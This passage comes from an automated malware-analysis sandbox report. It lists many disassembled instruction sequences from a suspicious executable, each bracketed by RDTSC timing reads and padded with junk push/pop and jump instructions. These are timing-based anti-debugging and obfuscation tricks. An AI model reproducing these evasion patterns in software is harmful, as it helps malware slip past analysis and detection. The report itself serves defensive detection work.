Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF54AF second address: AF54B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF54B5 second address: AF54D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BD0FFF0CFh 0x0000000a ja 00007F5BD0FFF0CCh 0x00000010 jng 00007F5BD0FFF0C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AF54D9 second address: AF54DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFABE4 second address: AFABEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F5BD0FFF0C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFABEF second address: AFABFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jng 00007F5BD0C7BA66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFABFD second address: AFAC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAD71 second address: AFAD83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F5BD0C7BA6Ah 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAD83 second address: AFAD8D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BD0FFF0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AFAF25 second address: AFAF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F5BD0C7BA88h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFAF37 second address: AFAF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB2D3 second address: AFB2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5BD0C7BA66h 0x0000000a pop ebx 0x0000000b jns 00007F5BD0C7BA6Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB2EA second address: AFB2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB2EF second address: AFB2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB2FB second address: AFB301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB301 second address: AFB30A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB30A second address: AFB345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BD0FFF0D9h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F5BD0FFF0D2h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB6EF second address: AFB701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5BD0C7BA66h 0x0000000a jno 00007F5BD0C7BA66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB701 second address: AFB706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB706 second address: AFB723 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BD0C7BA6Eh 0x00000008 jno 00007F5BD0C7BA66h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jnp 00007F5BD0C7BA66h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB9D3 second address: AFB9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0FFF0D2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB9ED second address: AFB9F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFB9F5 second address: AFB9FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: AFBD40 second address: AFBD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: A749F0 second address: A749F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: A749F6 second address: A749FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: A749FB second address: A74A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F5BD0FFF0C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B00D77 second address: B00D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABB790 second address: ABB794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABB839 second address: ABB862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F5BD0C7BA77h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABB862 second address: ABB8BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub edi, dword ptr [ebp+12A32BF2h] 0x00000010 call 00007F5BD0FFF0C9h 0x00000015 jmp 00007F5BD0FFF0D1h 0x0000001a push eax 0x0000001b jmp 00007F5BD0FFF0CAh 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jne 00007F5BD0FFF0D2h 0x0000002a mov eax, dword ptr [eax] 0x0000002c push ecx 0x0000002d js 00007F5BD0FFF0CCh 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABB8BD second address: ABB8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BD0C7BA6Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABB8D4 second address: ABB8E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABB9AA second address: ABB9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABBA8E second address: ABBAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABBAAE second address: ABBAB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABBB52 second address: ABBB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABC501 second address: ABC51A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0C7BA6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: ABC51A second address: ABC520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B01044 second address: B01061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA77h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B011BD second address: B011C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B011C3 second address: B011CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BD0C7BA6Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0145C second address: B01460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B01460 second address: B0147A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jp 00007F5BD0C7BA6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0147A second address: B0147E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0160F second address: B01630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5BD0C7BA66h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0C7BA74h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0198B second address: B01990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B01990 second address: B0199C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F5BD0C7BA66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0616B second address: B06176 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0835F second address: B08363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0AD6F second address: B0AD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BD0FFF0C6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0AD7A second address: B0AD8A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BD0C7BA72h 0x00000008 jns 00007F5BD0C7BA66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B04D second address: B0B053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B053 second address: B0B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B057 second address: B0B076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5BD0FFF0D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B1B9 second address: B0B1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B1BD second address: B0B1CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5BD0FFF0C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B1CD second address: B0B1D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B0B1D3 second address: B0B1DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B10AA6 second address: B10AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B10AAC second address: B10ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BD0FFF0C6h 0x0000000a jne 00007F5BD0FFF0C6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B10ABD second address: B10AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B11277 second address: B11289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F5BD0FFF0C6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B159F6 second address: B15A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F5BD0C7BA6Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B15A0B second address: B15A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0FFF0CDh 0x00000009 popad 0x0000000a push edx 0x0000000b je 00007F5BD0FFF0C6h 0x00000011 jp 00007F5BD0FFF0C6h 0x00000017 pop edx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B19C03 second address: B19C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B19C21 second address: B19C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5BD0FFF0CCh 0x0000000e jnp 00007F5BD0FFF0C6h 0x00000014 jl 00007F5BD0FFF0CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B19C3D second address: B19C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B193C2 second address: B193CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5BD0FFF0C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B193CC second address: B193E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5BD0C7BA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B193E7 second address: B193FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jno 00007F5BD0FFF0C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B19817 second address: B1981D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1F491 second address: B1F4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BD0FFF0C6h 0x0000000a jmp 00007F5BD0FFF0D9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1F4B4 second address: B1F4D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BD0C7BA66h 0x00000008 jmp 00007F5BD0C7BA70h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1F621 second address: B1F630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F5BD0FFF0CEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1F8EF second address: B1F8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1F8F9 second address: B1F90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1FC44 second address: B1FC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5BD0C7BA66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0C7BA71h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1FC62 second address: B1FC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B1FF66 second address: B1FF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5BD0C7BA6Dh 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B2051B second address: B2055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnp 00007F5BD0FFF0C6h 0x0000000b pop eax 0x0000000c jg 00007F5BD0FFF0D4h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F5BD0FFF0D8h 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B2055D second address: B2057E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA75h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5BD0C7BA66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B2057E second address: B20582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B208D9 second address: B208DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B208DE second address: B208E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B20BAB second address: B20BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B20BB1 second address: B20BCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B20BCD second address: B20BD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B2119B second address: B211A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B211A3 second address: B211A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29A24 second address: B29A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5BD0FFF0CEh 0x0000000a pushad 0x0000000b jmp 00007F5BD0FFF0D8h 0x00000010 jo 00007F5BD0FFF0C6h 0x00000016 jmp 00007F5BD0FFF0D1h 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F5BD0FFF0CBh 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29A7E second address: B29A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29A84 second address: B29A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
